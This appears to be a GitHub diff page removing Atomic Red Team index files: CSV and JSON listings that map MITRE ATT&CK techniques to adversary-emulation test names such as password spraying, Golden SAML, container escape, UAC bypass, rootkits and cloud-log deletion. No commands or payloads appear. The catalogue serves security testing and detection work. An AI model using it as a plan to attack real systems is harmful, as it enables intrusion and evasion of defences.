Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/azure-ad-index.csv
-14
View File
@@ -1,14 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
3 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
4 credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
5 credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
6 defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
7 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
8 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
9 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
10 persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
11 persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
12 persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
13 persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
14 persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
atomics/Indexes/Indexes-CSV/containers-index.csv
-18
View File
@@ -1,18 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 discovery T1613 Container and Resource Discovery 1 Container and ResourceDiscovery 8a895923-f99f-4668-acf2-6cc59a44f05e sh
3 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
4 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
5 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
6 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
7 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
8 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
9 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
10 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
11 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
12 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
13 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
14 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
15 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
16 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
17 defense-evasion T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
18 defense-evasion T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh
atomics/Indexes/Indexes-CSV/google-workspace-index.csv
-5
View File
@@ -1,5 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
3 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
4 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
5 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
atomics/Indexes/Indexes-CSV/iaas-index.csv
-26
View File
@@ -1,26 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1201,Password Policy Discovery,11,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 1 AWS - CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
3 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
4 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
5 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
6 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
7 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
8 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 2 Azure - Dump Azure Instance Metadata from Virtual Machines cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7 powershell
9 credential-access T1110.003 Brute Force: Password Spraying 9 AWS - Password Spray an AWS using GoAWSConsoleSpray 9c10d16b-20b1-403a-8e67-50ef7117ed4e sh
10 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
11 discovery T1201 Password Policy Discovery 11 Examine AWS Password Policy 15330820-d405-450b-bd08-16b5be5be9f4 sh
12 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
13 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
14 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
15 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
16 persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
17 persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
18 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
19 persistence T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
20 collection T1530 Data from Cloud Storage Object 1 Azure - Enumerate Azure Blobs with MicroBurst 3dab4bcc-667f-4459-aea7-4162dd2d6590 powershell
21 collection T1530 Data from Cloud Storage Object 2 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
22 collection T1530 Data from Cloud Storage Object 3 AWS - Scan for Anonymous Access to S3 979356b9-b588-4e49-bba4-c35517c484f5 sh
23 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
24 initial-access T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
25 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
26 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
atomics/Indexes/Indexes-CSV/index.csv
-1646
View File
@@ -1,1646 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
